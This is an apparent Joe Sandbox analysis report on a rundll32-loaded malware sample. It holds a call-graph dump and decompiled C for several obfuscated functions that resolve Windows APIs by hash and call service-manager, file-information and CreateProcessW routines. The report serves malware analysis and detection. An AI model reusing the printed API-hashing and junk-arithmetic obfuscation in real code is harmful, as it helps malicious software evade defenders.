8737->8733 8737->8734 8737->8735 8737->8736 8738 738650 GetPEB 8737->8738 8739 739700 3 API calls 8737->8739 8740 73e7ce GetPEB 8737->8740 8741 73ae03 GetPEB 8737->8741 8742 74c38f 3 API calls 8737->8742 8738->8737 8739->8737 8740->8737 8741->8737 8742->8737 8749 740c1d 8743->8749 8744 740d15 8745 73f88a GetPEB 8744->8745 8747 740d13 8745->8747 8746 748d71 GetPEB 8746->8749 8747->8029 8748 744eff GetPEB 8748->8749 8749->8744 8749->8746 8749->8747 8749->8748 8750 74e713 GetPEB 8749->8750 8750->8749 8760 738c4b 8751->8760 8752 739700 3 API calls 8752->8760 8753 7512a8 GetPEB 8753->8760 8754 738d8a 8754->8029 8755 744fa8 GetPEB 8755->8760 8756 738650 GetPEB 8756->8760 8757 73ab66 2 API calls 8757->8760 8758 73e7ce GetPEB 8758->8760 8759 73ae03 GetPEB 8759->8760 8760->8752 8760->8753 8760->8754 8760->8755 8760->8756 8760->8757 8760->8758 8760->8759 8761 74c38f 3 API calls 8760->8761 8761->8760 8763 73f89d 8762->8763 8766 735961 8763->8766 8767 73597e 8766->8767 8768 732d9f GetPEB 8767->8768 8769 7359f7 8768->8769 8769->8668 8771 744f24 8770->8771 8772 732d9f GetPEB 8771->8772 8773 744f95 8772->8773 8773->8674 8775 748d8c 8774->8775 8776 748fc8 8775->8776 8787 73b0da 8775->8787 8776->8674 8779 74fd29 GetPEB 8780 748f83 8779->8780 8780->8776 8781 74fd29 GetPEB 8780->8781 8781->8780 8785 74e72b 8782->8785 8783 74e875 8783->8674 8784 74f949 GetPEB 8784->8785 8785->8783 8785->8784 8791 74d20a 8785->8791 8788 73b0f7 8787->8788 8789 732d9f GetPEB 8788->8789 8790 73b172 8789->8790 8790->8776 8790->8779 8792 74d220 8791->8792 8793 732d9f GetPEB 8792->8793 8794 74d29a 8793->8794 8794->8785 8796 738664 8795->8796 8797 735ae2 GetPEB 8796->8797 8798 738710 8797->8798 8798->8683 8803 74c3a8 8799->8803 8800 74c64b 8802 744dad 2 API calls 8800->8802 8801 74c649 8801->8683 8802->8801 8803->8800 8803->8801 8805 74e938 2 API calls 8803->8805 8806 73eeb8 8803->8806 8805->8803 8807 73eed9 8806->8807 8808 732d9f GetPEB 8807->8808 8809 73ef5a 8808->8809 8809->8803 8811 732d9f GetPEB 
8810->8811 8812 74903c 8811->8812 8812->8692 8814 735ee9 8813->8814 8815 732d9f GetPEB 8814->8815 8816 735f68 8815->8816 8816->8692 8818 7377a8 8817->8818 8819 737a1d 8818->8819 8821 737a1b 8818->8821 8822 743512 2 API calls 8818->8822 8820 74f88f GetPEB 8819->8820 8820->8821 8821->8692 8822->8818 8824 74d3a0 8823->8824 8825 73c1dc GetPEB 8824->8825 8826 74d3c0 8825->8826 8826->8692 8828 74367d 8827->8828 8829 751310 GetPEB 8828->8829 8830 743b1e 8828->8830 8833 73ab66 2 API calls 8828->8833 8834 743b1c 8828->8834 8836 73ae03 GetPEB 8828->8836 8848 745b0e 8828->8848 8852 74c8bd 8828->8852 8829->8828 8856 736e34 8830->8856 8833->8828 8834->8723 8836->8828 8838 732d9f GetPEB 8837->8838 8839 7396f7 8838->8839 8839->8723 8843 73b43c 8840->8843 8844 739685 GetPEB 8843->8844 8845 73b615 8843->8845 8847 73b62e 8843->8847 8860 7513b1 8843->8860 8864 74fb2b 8843->8864 8844->8843 8846 744dad 2 API calls 8845->8846 8846->8847 8847->8723 8849 745b28 8848->8849 8850 732d9f GetPEB 8849->8850 8851 745ba3 8850->8851 8851->8828 8853 74c8fa 8852->8853 8854 732d9f GetPEB 8853->8854 8855 74c986 8854->8855 8855->8828 8857 736e4a 8856->8857 8858 732d9f GetPEB 8857->8858 8859 736ecb 8858->8859 8859->8834 8861 7513db 8860->8861 8862 732d9f GetPEB 8861->8862 8863 751455 8862->8863 8863->8843 8865 74fb44 8864->8865 8866 732d9f GetPEB 8865->8866 8867 74fbc1 8866->8867 8867->8843 8869 7387b5 8868->8869 8870 732d9f GetPEB 8869->8870 8871 73882f 8870->8871 8871->8035 8873 74c2fa 8872->8873 8874 732d9f GetPEB 8873->8874 8875 74c375 8874->8875 8875->8035 8877 737b0e 8876->8877 8878 732d9f GetPEB 8877->8878 8879 737b76 8878->8879 8879->8042 8881 731973 8880->8881 8882 733bf8 GetPEB 8881->8882 8884 731f7e 8881->8884 8886 73ae03 GetPEB 8881->8886 8887 731f7c 8881->8887 8888 73ab66 RtlAllocateHeap GetPEB 8881->8888 8890 73e7ce GetPEB 8881->8890 8891 731950 2 API calls 8881->8891 8892 74f7fc 8881->8892 8896 74baea 8881->8896 8882->8881 8900 748c35 8884->8900 8886->8881 8887->8052 8888->8881 8890->8881 
8891->8881 8893 74f812 8892->8893 8894 732d9f GetPEB 8893->8894 8895 74f881 8894->8895 8895->8881 8897 74bb04 8896->8897 8898 732d9f GetPEB 8897->8898 8899 74bba3 8898->8899 8899->8881 8901 748c4e 8900->8901 8902 732d9f GetPEB 8901->8902 8903 748ccb 8902->8903 8903->8887 8905 733da3 8904->8905 8906 732d9f GetPEB 8905->8906 8907 733e1f 8906->8907 8907->8068 8909 745a75 8908->8909 8910 732d9f GetPEB 8909->8910 8911 745b03 8910->8911 8911->8068 8914 74a17e 8912->8914 8913 74a3cc 8915 73bb4b 2 API calls 8913->8915 8914->8913 8916 74a3ca 8914->8916 8924 743f73 8914->8924 8917 74a3e2 8915->8917 8916->8072 8928 73f154 8917->8928 8923 73ae03 GetPEB 8923->8916 8925 743f89 8924->8925 8926 732d9f GetPEB 8925->8926 8927 744007 8926->8927 8927->8914 8937 735c03 8928->8937 8930 73f2b6 8933 74d1c1 8930->8933 8934 74d1e5 8933->8934 8935 73c1dc GetPEB 8934->8935 8936 74a409 8935->8936 8936->8923 8938 735c1d 8937->8938 8939 732d9f GetPEB 8938->8939 8940 735c8b 8939->8940 8940->8930 8941 73884a 8940->8941 8942 738877 8941->8942 8943 732d9f GetPEB 8942->8943 8944 7388de 8943->8944 8944->8930 8950 7510a9 8945->8950 8946 73ab66 2 API calls 8946->8950 8947 743512 2 API calls 8947->8950 8948 74bdb5 GetPEB 8948->8950 8949 751287 8949->8083 8950->8946 8950->8947 8950->8948 8950->8949 8951 75126e 8950->8951 8953 73ae03 GetPEB 8950->8953 8963 74eae6 8950->8963 8954 7368de GetPEB 8951->8954 8953->8950 8954->8949 8956 74ee25 8955->8956 8967 740d33 8956->8967 8960 736e2f 8959->8960 8962 736e11 8959->8962 8960->8083 8961 7368de GetPEB 8961->8962 8962->8960 8962->8961 8964 74eb05 8963->8964 8965 743512 2 API calls 8964->8965 8966 74ebb1 8965->8966 8966->8950 8966->8966 8973 740d4d 8967->8973 8970 740ead 8972 7368de GetPEB 8970->8972 8974 740eab 8972->8974 8973->8970 8973->8974 8975 743512 2 API calls 8973->8975 8976 74acd3 8973->8976 8986 753672 8973->8986 8991 739a7d 8973->8991 8974->8083 8975->8973 8983 74b1d7 8976->8983 8978 74b1ff 8980 737027 GetPEB 8978->8980 8979 74b38c 8979->8979 8981 
74b220 8980->8981 8981->8973 8982 73ab66 RtlAllocateHeap GetPEB 8982->8983 8983->8978 8983->8979 8983->8982 8984 740eda GetPEB 8983->8984 8985 73ae03 GetPEB 8983->8985 9008 74f9e2 8983->9008 8984->8983 8985->8983 9012 74e884 8986->9012 8989 7368de GetPEB 8990 753775 8989->8990 8990->8973 9007 73a69f 8991->9007 8993 744e64 GetPEB 8993->9007 8994 73ab36 8996 737027 GetPEB 8994->8996 8999 73ab34 8996->8999 8999->8973 9000 740eda GetPEB 9000->9007 9002 74e884 GetPEB 9002->9007 9003 73ab66 RtlAllocateHeap GetPEB 9003->9007 9004 73ae03 GetPEB 9004->9007 9005 74fd29 GetPEB 9005->9007 9006 74f9e2 GetPEB 9006->9007 9007->8993 9007->8994 9007->8999 9007->9000 9007->9002 9007->9003 9007->9004 9007->9005 9007->9006 9016 74d76f 9007->9016 9020 735fe2 9007->9020 9024 733e2a 9007->9024 9028 73cfce 9007->9028 9043 73f0a0 9007->9043 9009 74fa0f 9008->9009 9010 732d9f GetPEB 9009->9010 9011 74fa7d 9010->9011 9011->8983 9013 74e897 9012->9013 9014 732d9f GetPEB 9013->9014 9015 74e92c 9014->9015 9015->8989 9017 74d785 9016->9017 9018 732d9f GetPEB 9017->9018 9019 74d7fe 9018->9019 9019->9007 9021 736004 9020->9021 9022 732d9f GetPEB 9021->9022 9023 736070 9022->9023 9023->9007 9025 733e5a 9024->9025 9026 732d9f GetPEB 9025->9026 9027 733ee1 9026->9027 9027->9007 9030 73dd8e 9028->9030 9029 73e107 9032 737027 GetPEB 9029->9032 9030->9029 9031 73e23e 9030->9031 9034 7368de GetPEB 9030->9034 9035 74fbcf GetPEB 9030->9035 9037 743512 2 API calls 9030->9037 9038 73ab66 RtlAllocateHeap GetPEB 9030->9038 9039 740eda GetPEB 9030->9039 9040 73ae03 GetPEB 9030->9040 9041 74ba68 GetPEB 9030->9041 9047 735c98 9030->9047 9051 744016 9030->9051 9031->9031 9036 73e125 9032->9036 9034->9030 9035->9030 9036->9007 9037->9030 9038->9030 9039->9030 9040->9030 9041->9030 9044 73f0bc 9043->9044 9045 732d9f GetPEB 9044->9045 9046 73f13f 9045->9046 9046->9007 9048 735cc3 9047->9048 9049 732d9f GetPEB 9048->9049 9050 735d47 9049->9050 9050->9030 9052 74404d 9051->9052 9053 732d9f GetPEB 9052->9053 9054 7440d3 
9053->9054 9054->9030 9056 73c693 9055->9056 9057 732d9f GetPEB 9056->9057 9058 73c6fb 9057->9058 9058->8088 9060 741215 9059->9060 9061 732d9f GetPEB 9060->9061 9062 74128e 9061->9062 9062->8117 9064 735b7e 9063->9064 9065 732d9f GetPEB 9064->9065 9066 7343d9 9065->9066 9066->7900 9070 734522 9067->9070 9068 734704 9087 749045 9068->9087 9070->9068 9072 751310 GetPEB 9070->9072 9073 734702 9070->9073 9083 73ac8c 9070->9083 9072->9070 9073->8126 9081 74448f 9074->9081 9076 7445a5 9077 737af8 GetPEB 9076->9077 9078 7445a3 9077->9078 9078->8126 9079 73ab66 2 API calls 9079->9081 9080 738786 GetPEB 9080->9081 9081->9076 9081->9078 9081->9079 9081->9080 9082 73ae03 GetPEB 9081->9082 9091 73efa6 9081->9091 9082->9081 9084 73aca9 9083->9084 9085 732d9f GetPEB 9084->9085 9086 73ad23 9085->9086 9086->9070 9088 749062 9087->9088 9089 732d9f GetPEB 9088->9089 9090 7490c7 9089->9090 9090->9073 9092 73efbf 9091->9092 9093 732d9f GetPEB 9092->9093 9094 73f051 9093->9094 9094->9081 9095 74d80c 9096 74d8a5 9095->9096 9097 74d8cc 9095->9097 9101 745cf9 9096->9101 9100 743cbb 2 API calls 9100->9097 9113 746288 9101->9113 9102 74648d 9104 739700 3 API calls 9102->9104 9103 74e35a GetPEB 9103->9113 9105 74648b 9104->9105 9105->9097 9105->9100 9106 73ea7b 2 API calls 9106->9113 9107 751310 GetPEB 9107->9113 9108 7512a8 GetPEB 9108->9113 9110 73ab66 RtlAllocateHeap GetPEB 9110->9113 9111 73ae03 GetPEB 9111->9113 9112 73e7ce GetPEB 9112->9113 9113->9102 9113->9103 9113->9105 9113->9106 9113->9107 9113->9108 9113->9110 9113->9111 9113->9112 9114 74fc96 9113->9114 9115 74fcac 9114->9115 9116 732d9f GetPEB 9115->9116 9117 74fd1a lstrcmpiW 9116->9117 9117->9113

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 462 73ea7b-73eb35 call 73cf25 call 732d9f SHGetFolderPathW
                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E0073EA7B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t41;
                                                                                                                      				intOrPtr* _t50;
                                                                                                                      				void* _t51;
                                                                                                                      				signed int _t52;
                                                                                                                      				signed int _t53;
                                                                                                                      				void* _t60;
                                                                                                                      
                                                                                                                      				_t60 = __edx;
                                                                                                                      				E0073CF25(_t41);
                                                                                                                      				_v16 = 0xd33285;
                                                                                                                      				_v16 = _v16 + 0xd9cb;
                                                                                                                      				_v16 = _v16 | 0xd94823ae;
                                                                                                                      				_v16 = _v16 ^ 0xd9d95ea2;
                                                                                                                      				_v8 = 0xf9f040;
                                                                                                                      				_v8 = _v8 ^ 0x026675a4;
                                                                                                                      				_t52 = 0x46;
                                                                                                                      				_v8 = _v8 / _t52;
                                                                                                                      				_t53 = 0x2b;
                                                                                                                      				_v8 = _v8 / _t53;
                                                                                                                      				_v8 = _v8 ^ 0x000f054e;
                                                                                                                      				_v12 = 0x255c2b;
                                                                                                                      				_v12 = _v12 ^ 0x0b9b7933;
                                                                                                                      				_v12 = _v12 + 0xffff1ebc;
                                                                                                                      				_v12 = _v12 ^ 0x0bb758ac;
                                                                                                                      				_t50 = E00732D9F(0x111af765, 0x1c, _t53, 0xe4d0349b);
                                                                                                                      				_t51 =  *_t50(0, _a8, 0, 0, _t60, 0, __edx, _a4, _a8, 0, _a16, _a20, _a24, 0); // executed
                                                                                                                      				return _t51;
                                                                                                                      			}













                                                                                                                      APIs
                                                                                                                      • SHGetFolderPathW.SHELL32(00000000,D9D95EA2,00000000,00000000,?), ref: 0073EB2E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FolderPath
                                                                                                                      • String ID: +\%
                                                                                                                      • API String ID: 1514166925-2522068492
                                                                                                                      • Opcode ID: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction ID: e354533e284a663d70fdd64fd0ffdf4f21065de5a964470915759ad1b32ddbfb
                                                                                                                      • Opcode Fuzzy Hash: 330e92cc225222d78e9e6c648ddc1dce5f76f2eb2b005bdd55b658b133651eb5
                                                                                                                      • Instruction Fuzzy Hash: 30119736D00208FBDB14DEE6C94A8DFBFB5EB85310F108099F504A6211E7754B61AF50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 467 73eb36-73ebf1 call 73cf25 call 732d9f OpenSCManagerW
                                                                                                                      C-Code - Quality: 68%
                                                                                                                      			E0073EB36(void* __ecx, intOrPtr _a4, int _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _v28;
                                                                                                                      				intOrPtr _v32;
                                                                                                                      				void* _t40;
                                                                                                                      				void* _t52;
                                                                                                                      				signed int _t54;
                                                                                                                      				signed int _t55;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(0);
                                                                                                                      				E0073CF25(_t40);
                                                                                                                      				_v32 = 0xf43dc;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_t54 = 0x7c;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v12 = 0x784be4;
                                                                                                                      				_t6 =  &_v12; // 0x784be4
                                                                                                                      				_t55 = 0x36;
                                                                                                                      				_v12 =  *_t6 / _t54;
                                                                                                                      				_v12 = _v12 + 0x9f6a;
                                                                                                                      				_v12 = _v12 * 0x31;
                                                                                                                      				_v12 = _v12 ^ 0x004694cb;
                                                                                                                      				_v8 = 0x884396;
                                                                                                                      				_v8 = _v8 << 2;
                                                                                                                      				_v8 = _v8 ^ 0x1535ea2d;
                                                                                                                      				_v8 = _v8 | 0xb4c8309a;
                                                                                                                      				_v8 = _v8 ^ 0xb7dc5be9;
                                                                                                                      				_v16 = 0x9578bf;
                                                                                                                      				_v16 = _v16 / _t55;
                                                                                                                      				_v16 = _v16 ^ 0x000e2a9d;
                                                                                                                      				E00732D9F(0xcb6a962, 0x1f4, _t55, 0x1b74c9e2);
                                                                                                                      				_t52 = OpenSCManagerW(0, 0, _a12); // executed
                                                                                                                      				return _t52;
                                                                                                                      			}













                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 0073EBEA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: ManagerOpen
                                                                                                                      • String ID: Kx
                                                                                                                      • API String ID: 1889721586-2841836380
                                                                                                                      • Opcode ID: 41dff3092bc1f63532a7cccec9612a866476fb4b2cab239042f705f6c49823a2
                                                                                                                      • Instruction ID: 01d7eb478d017ae711386a8fa65b450f6c1d14cb966ee3bdbeb40c7f8f661b19
                                                                                                                      • Opcode Fuzzy Hash: 41dff3092bc1f63532a7cccec9612a866476fb4b2cab239042f705f6c49823a2
                                                                                                                      • Instruction Fuzzy Hash: 2D118671D05208FBEB04EFA6D84A9DEBFB5EF44310F208099E404B6211D7B95B14CB90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      C-Code - Quality: 58%
                                                                                                                      			E00735D65(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				signed int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t31;
                                                                                                                      				intOrPtr* _t38;
                                                                                                                      				void* _t39;
                                                                                                                      				void* _t42;
                                                                                                                      
                                                                                                                      				_t42 = __edx;
                                                                                                                      				E0073CF25(_t31);
                                                                                                                      				_v12 = 0x1c122d;
                                                                                                                      				_v12 = _v12 * 0x6a;
                                                                                                                      				_v12 = _v12 ^ 0xecdd50d1;
                                                                                                                      				_v12 = _v12 ^ 0xe74257e3;
                                                                                                                      				_v16 = 0xd55139;
                                                                                                                      				_v16 = _v16 + 0xd07c;
                                                                                                                      				_v16 = _v16 ^ 0x00d6881e;
                                                                                                                      				_v8 = 0x156dc9;
                                                                                                                      				_v8 = _v8 * 0x43;
                                                                                                                      				_v8 = _v8 ^ 0x03beef10;
                                                                                                                      				_v8 = _v8 + 0xffffe13f;
                                                                                                                      				_v8 = _v8 ^ 0x06271f08;
                                                                                                                      				_t38 = E00732D9F(0x4ef88dcb, 0x31, __ecx, 0xa62ab78c);
                                                                                                                      				_t39 =  *_t38(_t42, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
                                                                                                                      				return _t39;
                                                                                                                      			}











                                                                                                                      APIs
                                                                                                                      • SetFileInformationByHandle.KERNEL32(?,00000000,?,00000028), ref: 00735E04
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: FileHandleInformation
                                                                                                                      • String ID: WB
                                                                                                                      • API String ID: 3935143524-2158411504
                                                                                                                      • Opcode ID: 43935c843aae4829611c0686b053fedb4fd8e6d3d3521d64be353873fdee31cf
                                                                                                                      • Instruction ID: 41f65f2b695b9bbd9bd7e5cdfe7ad1ac95da54c365ec2ee65d6d67b426665c35
                                                                                                                      • Opcode Fuzzy Hash: 43935c843aae4829611c0686b053fedb4fd8e6d3d3521d64be353873fdee31cf
                                                                                                                      • Instruction Fuzzy Hash: 1A112576D0120CFBDF10DFA4D946ACEBFB4EB14300F208088F9107A2A1D7755B64AB81
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      control_flow_graph 477 74e689-74e712 call 73cf25 call 732d9f CloseServiceHandle
                                                                                                                      C-Code - Quality: 73%
                                                                                                                      			E0074E689(void* __ecx, void* __edx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                                                                      				unsigned int _v8;
                                                                                                                      				signed int _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				void* _t27;
                                                                                                                      				int _t34;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0073CF25(_t27);
                                                                                                                      				_v8 = 0x8d6642;
                                                                                                                      				_v8 = _v8 >> 0xa;
                                                                                                                      				_v8 = _v8 + 0x9ccb;
                                                                                                                      				_v8 = _v8 >> 0xd;
                                                                                                                      				_v8 = _v8 ^ 0x0002819d;
                                                                                                                      				_v16 = 0x6a74c5;
                                                                                                                      				_v16 = _v16 | 0x354c93f6;
                                                                                                                      				_v16 = _v16 ^ 0x356d05ed;
                                                                                                                      				_v12 = 0xe812c4;
                                                                                                                      				_v12 = _v12 * 0x26;
                                                                                                                      				_v12 = _v12 ^ 0x227e2d65;
                                                                                                                      				E00732D9F(0x23833043, 0x1ec, __ecx, 0x1b74c9e2);
                                                                                                                      				_t34 = CloseServiceHandle(_a8); // executed
                                                                                                                      				return _t34;
                                                                                                                      			}









                                                                                                                      APIs
                                                                                                                      • CloseServiceHandle.ADVAPI32(356D05ED), ref: 0074E70D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleService
                                                                                                                      • String ID: e-~"
                                                                                                                      • API String ID: 1725840886-2046105602
                                                                                                                      • Opcode ID: c1046b7ecd956da74b7a5d1762cebc86866113f0b369af2bd128aca44436a943
                                                                                                                      • Instruction ID: 4060cf60ed89faeb230967125dba32792052e58f0fa98173b6114d4715cd81b3
                                                                                                                      • Opcode Fuzzy Hash: c1046b7ecd956da74b7a5d1762cebc86866113f0b369af2bd128aca44436a943
                                                                                                                      • Instruction Fuzzy Hash: 9601E575C0020CFBCB08EFA4D98689EBFB4EB54304F208188E914A6251D3759B649F50
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 482 744dad-744e63 call 73cf25 call 732d9f CloseHandle
                                                                                                                      C-Code - Quality: 72%
                                                                                                                      			E00744DAD(void* __ecx, void* __edx, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				void* _v28;
                                                                                                                      				intOrPtr _v32;
                                                                                                                      				void* _t41;
                                                                                                                      				int _t50;
                                                                                                                      				signed int _t52;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				E0073CF25(_t41);
                                                                                                                      				_v32 = 0xb76b6b;
                                                                                                                      				asm("stosd");
                                                                                                                      				asm("stosd");
                                                                                                                      				_t52 = 0x74;
                                                                                                                      				asm("stosd");
                                                                                                                      				_v16 = 0xdf8814;
                                                                                                                      				_v16 = _v16 | 0xf44f2943;
                                                                                                                      				_v16 = _v16 << 6;
                                                                                                                      				_v16 = _v16 >> 5;
                                                                                                                      				_v16 = _v16 ^ 0x01b79e59;
                                                                                                                      				_v12 = 0x5a8921;
                                                                                                                      				_v12 = _v12 / _t52;
                                                                                                                      				_v12 = _v12 << 0xd;
                                                                                                                      				_v12 = _v12 >> 0xd;
                                                                                                                      				_v12 = _v12 ^ 0x000807b1;
                                                                                                                      				_v8 = 0x5c56e6;
                                                                                                                      				_v8 = _v8 ^ 0x7431396c;
                                                                                                                      				_v8 = _v8 + 0xffff5a5b;
                                                                                                                      				_v8 = _v8 + 0x50a9;
                                                                                                                      				_v8 = _v8 ^ 0x74635491;
                                                                                                                      				E00732D9F(0x25d2a026, 0x1b9, _t52, 0xa62ab78c);
                                                                                                                      				_t50 = CloseHandle(_a4); // executed
                                                                                                                      				return _t50;
                                                                                                                      			}












                                                                                                                      APIs
                                                                                                                      • CloseHandle.KERNEL32(000807B1,?,?,?,?,?,?,?,?,?), ref: 00744E5D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Offset: 00730000, based on PE: true
                                                                                                                      • Associated: 0000000C.00000002.510033009.0000000000730000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 0000000C.00000002.510057605.0000000000755000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_12_2_730000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandle
                                                                                                                      • String ID: l91t
                                                                                                                      • API String ID: 2962429428-3929799471
                                                                                                                      • Opcode ID: 8da09b77d3d2241b99642312c43de4b26fc02d46d5695bad48a0b92c4f965d63
                                                                                                                      • Instruction ID: 49e7b2294f2da53d0443ac0db9372995b733812732221af4c25bbdc51ccb3035
                                                                                                                      • Opcode Fuzzy Hash: 8da09b77d3d2241b99642312c43de4b26fc02d46d5695bad48a0b92c4f965d63
                                                                                                                      • Instruction Fuzzy Hash: 9A113476D0060CFFEB05DFE5D84A89EBBB0EB40314F50C088E914A6256D7B99B588F42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 520 74679c-746863 call 73cf25 call 732d9f CreateProcessW
                                                                                                                      C-Code - Quality: 39%
                                                                                                                      			E0074679C(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, struct _STARTUPINFOW* _a36, intOrPtr _a40, intOrPtr _a48, WCHAR* _a60, int _a64) {
                                                                                                                      				signed int _v8;
                                                                                                                      				unsigned int _v12;
                                                                                                                      				unsigned int _v16;
                                                                                                                      				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                      				intOrPtr _v24;
                                                                                                                      				void* _t40;
                                                                                                                      				int _t46;
                                                                                                                      				WCHAR* _t50;
                                                                                                                      
                                                                                                                      				_push(_a64);
                                                                                                                      				_t50 = __ecx;
                                                                                                                      				_push(_a60);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a48);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a40);
                                                                                                                      				_push(_a36);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a28);
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(_a16);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E0073CF25(_t40);
                                                                                                                      				_v24 = 0x639852;
                                                                                                                      				_v20 = 0;
                                                                                                                      				_v12 = 0x9647c4;
                                                                                                                      				_v12 = _v12 + 0x4343;
                                                                                                                      				_v12 = _v12 >> 0x10;
                                                                                                                      				_v12 = _v12 ^ 0x0009af77;
                                                                                                                      				_v16 = 0x17e0ca;
                                                                                                                      				_v16 = _v16 >> 4;
                                                                                                                      				_v16 = _v16 ^ 0x000f0fb4;
                                                                                                                      				_v8 = 0x429f7b;
                                                                                                                      				_v8 = _v8 + 0xffff27c2;
                                                                                                                      				_v8 = _v8 + 0xb08b;
                                                                                                                      				_v8 = _v8 ^ 0x004b6691;
                                                                                                                      				E00732D9F(0xb8601dc2, 0x1c8, __ecx, 0xa62ab78c);
                                                                                                                      				_t46 = CreateProcessW(_a60, _t50, 0, 0, _a64, 0, 0, 0, _a36, _a4); // executed
                                                                                                                      				return _t46;
                                                                                                                      			}












                                                                                                                      APIs
